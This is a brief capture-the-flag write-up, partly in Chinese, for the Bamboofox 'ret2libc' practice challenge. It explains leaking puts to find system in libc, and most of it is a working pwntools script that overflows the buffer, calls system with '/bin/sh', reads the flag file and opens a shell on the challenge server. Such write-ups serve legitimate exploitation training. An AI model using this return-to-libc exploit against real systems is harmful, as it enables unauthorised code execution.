# Bamboofox/train/ret2libc [50] ###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup` 題目檔案連結:http://gofile.me/6lhQ2/HONujKdAa 這題算是實作練習 概念就是將puts的位址弄出來，推算system的位址後，蓋到return address去 ``` # -*- coding: UTF-8 -*- from pwn import * context.arch = 'i386' local = False debug = False gdb1 = False elf1 = ELF("./libc.so.6") if debug == True: context.log_level = "debug" if local == True: r = process("./ret2libc") if gdb1 == True: gdb.attach(r) else: r = remote('bamboofox.cs.nctu.edu.tw', 11002) r.recvuntil("puts\" is ") binsh = 0x804a02c puts = int(r.recv(10), 16) puts_offset = elf1.symbols['puts'] system_offset = elf1.symbols['system'] system = puts-puts_offset+system_offset r.sendline(b"a"*0x20+p32(system)+p32(0)+p32(binsh)) r.sendline("cat /home/ctf/flag") r.interactive() ```